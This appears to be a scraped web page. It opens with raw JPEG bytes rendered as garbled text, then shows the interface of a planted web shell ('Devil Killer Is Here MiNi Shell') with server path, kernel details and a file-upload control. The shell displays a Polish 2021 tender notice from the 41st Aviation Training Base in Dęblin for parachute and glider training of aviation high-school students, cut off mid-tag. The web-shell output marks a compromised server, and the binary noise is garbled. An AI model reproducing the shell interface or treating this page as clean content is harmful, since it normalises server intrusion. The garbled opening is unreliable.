JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210419/0003563501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00035635 z dnia 2021-04-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup usługi szkolenia lotniczego (spadochronowego i szybowcowego) dla uczniów Ogólnokształcącego Liceum Lotniczego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261-517-818</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261-519-536</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup usługi szkolenia lotniczego (spadochronowego i szybowcowego) dla uczniów Ogólnokształcącego Liceum Lotniczego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5f199d7c-9c21-11eb-945c-72824b6a02d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00035635</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010869/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Szkolenie lotnicze dla uczniów OLL</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/41blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie prowadzone za pośrednictwem Platformy Zakupowej pod adresem: https://platformazakupowa.pl/pn/41blsz/proceedings 2. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: 41blsz.przetargi@ron.mil.pl , z zastrzeżeniem, że oferta musi wpłynąć na Platformę Zakupową Zamawiającego a nie na wskazaną pocztę elektroniczną!3. Jeżeli Zamawiający zdecyduje się na przeprowadzenie negocjacji- Negocjacje będą prowadzone elektronicznie za pośrednictwem platformy zakupowej: https://platformazakupowa.pl poprzez wzajemną wymianę wiadomości między Zamawiającym a Wykonawcą. Po zakończeniu negocjacji Zamawiający sporządzi protokół z negocjacji, którego treść będzie zaakceptowana przez Wykonawcę za pośrednictwem platformy zakupowej https://platformazakupowa.pl/pn/41blsz/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c)	zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja 10.0.;d)	włączona obsługa JavaScript;e)	zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.;f)	platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.2. Szczegółowo informacje zawarte są w Rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: - administratorem Pani/Pana danych osobowych jest:41. Baza Lotnictwa Szkolnego w Dęblinieul. Brygady Pościgowej 508 – 521 Dęblin,NIP:506-011-18-75, REGON: 061456920kontakt: tel. 261 517 525 e-mail: 41blsz.przetargi@ron.mil.plPani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: przeprowadzonego w trybie podstawowym z możliwością negocjacji tj: dotyczącego „Zakup usługi szkolenia lotniczego (spadochronowego i szybowcowego) dla uczniów Ogólnokształcącego Liceum Lotniczego”Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z póxn. zm. ), dalej „ustawa Pzp”; 	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;	posiada Pani/Pan:−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; −	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;	nie przysługuje Pani/Panu:−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO*Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/21/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE I - teoretyczne i praktyczne szkolenie spadochronowe dla maks. 36 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie.2. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1a do SWZ.3. Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia spadochronowego na poziomie 18 uczniów (ZADANIE I). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80412000-5 - Usługi szkół pilotażu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia: spadochronowego na poziomie 18 uczniów (ZADANIE I) <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-06-26 do 2021-08-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">X - Cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” - będzie rozpatrywane na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia spadochronowego dla maksymalnie 36 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178).Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X - ilość punktów uzyskanych w kryterium „cena brutto oferty”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu I wynosi 100 punktów.Według zamawiającego za najkorzystniejszą w zadaniu I ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> X - Cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” - będzie rozpatrywane na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia spadochronowego dla maksymalnie 36 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178).Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X - ilość punktów uzyskanych w kryterium „cena brutto oferty”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu I wynosi 100 punktów.Według zamawiającego za najkorzystniejszą w zadaniu I ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów). <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE II – teoretyczne i praktyczne szkolenie szybowcowe dla maks. 16 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie.2. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1b do SWZ.3.	Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia: szybowcowego na poziomie 8 uczniów (ZADANIE II). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80412000-5 - Usługi szkół pilotażu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu (zarówno szybowcowym jaki i spadochronowym) w wyniku wystąpienia okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu lub uczeń nie uzyskał 50% punktów z wychowania fizycznego Lotniczej Akademii Wojskowej a z zachowania otrzymał ocenę niższą niż dobry). Zamawiający zastrzega sobie również możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w przypadku braku zgody rodziców/opiekunów prawnych uczniów na udział w szkoleniu w związku z zagrożeniem związanym z trwającą epidemią COVID - 19. Z tego tytułu nie przysługują Wykonawcy wobec Zamawiającego żadne roszczenia w tym w szczególności roszczenia pieniężne. Zamawiający określa minimalny zakres zamówienia dla teoretycznego i praktycznego szkolenia: szybowcowego na poziomie 8 uczniów (ZADANIE II). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-06-26 do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">X - Cena brutto oferty – waga 100 % Opis kryterium „cena brutto oferty”:Kryterium „cena brutto oferty” będzie rozpatrywane na podstawie ceny brutto oferty za przeprowadzenie teoretycznego i praktycznego szkolenia szybowcowego dla maksymalnie 16 uczniów Ogólnokształcącego Liceum Lotniczego w Dęblinie – zaoferowanej w Formularzu ofertowym - Załączniku nr 1 do SIWZ. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą. Zamawiający ofercie o najniższej cenie przyzna 100 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru: X = (Cn : Cb) x 100 x 100% (ilość punktów)gdzie:X1 – ilość punktów uzyskanych w kryterium „cena brutto oferty ”Cn – najniższa cena brutto Cb – cena brutto oferty ocenianejMaksymalna suma punktów X, jaką może uzyskać wykonawca w zadaniu II wynosi 100 punktów.Według zamawiającego za najkorzystniejszą na daną część zamówienia ofertę uznana zostanie oferta, która spełni wszystkie wymagania niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz otrzyma najwyższą ilość punktów obliczonych zgodnie z powyższym wzorem (przedstawi najkorzystniejszy bilans wskazanych wyżej kryteriów).Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami zaokrąglania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 